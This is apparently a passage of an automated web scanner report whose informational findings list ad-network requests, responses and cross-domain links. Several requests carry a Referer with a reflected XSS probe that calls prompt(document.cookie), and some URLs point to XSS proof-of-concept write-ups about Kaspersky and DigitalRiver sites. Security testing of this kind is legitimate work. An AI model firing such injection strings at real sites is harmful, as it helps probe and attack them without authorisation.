http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9490115737908119&output=html&h=200&slotname=3449664491&w=200&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527307&bpp=62&shv=r20110824&jsv=r20110719&prev_slotnames=2569267561&correlator=1315144527296&frm=4&adk=3206957786&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=226&ady=471&biw=1033&bih=910&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=2&dtd=174&xpc=hWxmcRumoD&p=http%3A//www.whatisnetwork.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html%26hl%3Den%26client%3Dca-pub-9490115737908119%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%2BScanner%26adU%3DNorton-Removal-Tool.Shop.CA.com%26adT%3DNorton%2BRemoval%2BTool%26gl%3DUS&usg=AFQjCNEUELZk6i_mxZLjrxKw6X0jTM2CKQ

Request

GET /pagead/ads?client=ca-pub-9490115737908119&output=html&h=200&slotname=3449664491&w=200&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527307&bpp=62&shv=r20110824&jsv=r20110719&prev_slotnames=2569267561&correlator=1315144527296&frm=4&adk=3206957786&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=226&ady=471&biw=1033&bih=910&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=2&dtd=174&xpc=hWxmcRumoD&p=http%3A//www.whatisnetwork.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.34. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163651&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145671605&bpp=16&shv=r20110824&jsv=r20110719&correlator=1315145671772&frm=4&adk=1607234649&ga_vid=113830990.1315145672&ga_sid=1315145672&ga_hid=1753120393&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&fu=0&ifi=1&dtd=277&xpc=OPO7x1ylGr&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEi5wJr-j-QeYxeNaOsv_P9oo15Fw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163651&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145671605&bpp=16&shv=r20110824&jsv=r20110719&correlator=1315145671772&frm=4&adk=1607234649&ga_vid=113830990.1315145672&ga_sid=1315145672&ga_hid=1753120393&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&fu=0&ifi=1&dtd=277&xpc=OPO7x1ylGr&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 14:13:55 GMT
Server: cafe
Cache-Control: private
Content-Length: 4138
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEi5wJr-j-QeYxeNaOsv_P9oo15Fw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

15.35. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157533&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&dt=1315139566051&bpp=14&shv=r20110824&jsv=r20110719&correlator=1315139567472&frm=4&adk=1607234649&ga_vid=471721686.1315139568&ga_sid=1315139568&ga_hid=1413465101&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=1567&xpc=I0oUZDKQZo&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH-MSLSif9Yk8XOX_b685bkzFrF3g

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157533&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&dt=1315139566051&bpp=14&shv=r20110824&jsv=r20110719&correlator=1315139567472&frm=4&adk=1607234649&ga_vid=471721686.1315139568&ga_sid=1315139568&ga_hid=1413465101&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=1567&xpc=I0oUZDKQZo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:32:10 GMT
Server: cafe
Cache-Control: private
Content-Length: 4125
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH-MSLSif9Yk8XOX_b685bkzFrF3g" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

15.36. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9490115737908119&output=html&h=250&slotname=9700637399&w=250&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527399&bpp=67&shv=r20110824&jsv=r20110719&prev_slotnames=2569267561%2C3449664491&correlator=1315144527296&frm=4&adk=4012302413&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1033&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=3&dtd=177&xpc=KV8z8YrOTp&p=http%3A//www.whatisnetwork.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html%26hl%3Den%26client%3Dca-pub-9490115737908119%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Davg.com/Antivirus%26adT%3DFree%2BAntivirus%2BDownload%26gl%3DUS&usg=AFQjCNE31JFxljUBoFzNkA4fajD2mt_ezA

Request

GET /pagead/ads?client=ca-pub-9490115737908119&output=html&h=250&slotname=9700637399&w=250&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527399&bpp=67&shv=r20110824&jsv=r20110719&prev_slotnames=2569267561%2C3449664491&correlator=1315144527296&frm=4&adk=4012302413&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1033&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=3&dtd=177&xpc=KV8z8YrOTp&p=http%3A//www.whatisnetwork.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 13:54:50 GMT
Server: cafe
Cache-Control: private
Content-Length: 12736
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html%26hl%3Den%26client%3Dca-pub-9490115737908119%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Davg.com/Antivirus%26adT%3DFree%2BAntivirus%2BDownload%26gl%3DUS&usg=AFQjCNE31JFxljUBoFzNkA4fajD2mt_ezA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.37. http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15949/135754/Capacity_Banner_3_640x480.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b78/2/0/*/c;245674177;0-0;0;43070067;255-0/0;43820099/43837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561

Request

GET /content/0/15949/135754/Capacity_Banner_3_640x480.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15949-135754-6950-5%3Fmpt%3D0.7740005844020561&mpt=0.7740005844020561&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/2/0/%2a/c%3B245674177%3B0-0%3B0%3B43070067%3B255-0/0%3B43820099/43837886/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/tc%2cac%2cl2c%2cc:/ HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=15949:6950/12896:18091/17550:16453/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:46:29 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 17:52:42 GMT
ETag: "8a79a7-f7f-4abd0cb778e80"
Accept-Ranges: bytes
Content-Length: 5451
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b78/2/0/*/c;245674177;0-0;0;43070067;255-0/0;43820099/43837886/1;;~aopt=2/0/25/0;~sscs=?http://tr.adinterax.com/re/computerworld,NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus,C=Citrix,P=NetworkWorld,A=Citrix,K=3059920/0.7740005844020561/0/tc,ac,l2c,c:/http://altfarm.mediaplex.com/ad/ck/15949-135754-6950-5?mpt=0.7740005844020561" target="_blank"><img src="http://img-cdn.mediaplex.com/0/15949/135754/Capacity_Banner_3_640x480.jpg" width="640" height="480" border="0" alt="">
...[SNIP]...

15.38. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=8258620

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:00 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4804
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=8258620" target="_blank"><img src="http://img-cdn.mediaplex.com/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.jpg" width="336" height="280" border="0" alt="">
...[SNIP]...

15.39. http://mi.adinterax.com/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mi.adinterax.com
Path:	/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js

Issue detail

The page was loaded from a URL containing a query string:

http://mi.adinterax.com/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js?adxq=1314835200

The response contains the following link to another domain:

http://altfarm.mediaplex.com/ad/js/15949-135754-6950-5?mpt='+adx_id_172003+'&mpvc='+adx_P_172003+adx_tp_172003+'/re/'+adx_data_172003+'/'+adx_id_172003+'/0/tc%2cac%2cl2c%2cc:/'+'

Request

GET /customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js?adxq=1314835200 HTTP/1.1
Host: mi.adinterax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 14344
Content-Type: application/x-javascript
Expires: Tue, 04 Oct 2011 05:55:13 GMT
Last-Modified: Thu, 01 Sep 2011 00:00:00 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.8
Date: Sun, 04 Sep 2011 14:46:27 GMT
Connection: keep-alive

var adx_v,adx_D_172003,adx_click,adx_U_172003,adx_tri=[],adx_trc_172003=[],adx_tt_172003,adx_ts_172003=['/0/ei'],adx_data_172003,adx_P_172003,adx_pc_172003=0,adx_ls_172003=[],adx_hl_172003=[],adx_id_1
...[SNIP]...
</scr'+'ipt>\n'+H+'!-- JavaScript Only -->\n<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/15949-135754-6950-5?mpt='+adx_id_172003+'&mpvc='+adx_P_172003+adx_tp_172003+'/re/'+adx_data_172003+'/'+adx_id_172003+'/0/tc%2cac%2cl2c%2cc:/'+'" onreadystatechange="if(/complete/.test(thi'+Q+'))adx_write(0)">\n</scr'+'ipt>
...[SNIP]...

15.40. http://office.microsoft.com/client/searchresults14.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://office.microsoft.com
Path:	/client/searchresults14.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://office.microsoft.com/client/searchresults14.aspx?NS=MSOUC&VERSION=14&LCID=1033&SYSLCID=1033&UILCID=1033&AD=1&tl=2&Query=xss&Scope=HP%2CHA%2CRZ%2CFX%2CXT%2CTC%2CXP%2CVA%2CDC%2CEM%2CLX

The response contains the following links to other domains:

http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/njs.gif?dcsuri=/nojavascript&WT.js=No
http://officeimg.vo.msecnd.net/_layouts/MicrosoftAjax.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/images/general/bing.png?b=5574%2E4000
